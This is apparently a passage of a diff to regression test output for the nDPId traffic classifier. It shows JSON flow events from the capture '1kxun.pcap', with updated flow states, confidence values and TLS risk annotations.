-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00912{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104395656,"flow_last_seen":1470104425762,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.7","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104395656,"flow_last_seen":1470104425762,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.10.7","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378557,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378557,"flow_last_seen":1470104408662,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":634,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.125.30","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399958,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399958,"flow_last_seen":1470104400059,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396888,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} 
-00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430065,"flow_last_seen":1470104430476,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396888,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104402624,"flow_last_seen":1470104402724,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":49735,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104380737,"flow_last_seen":1470104380772,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":54420,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104430065,"flow_last_seen":1470104430476,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 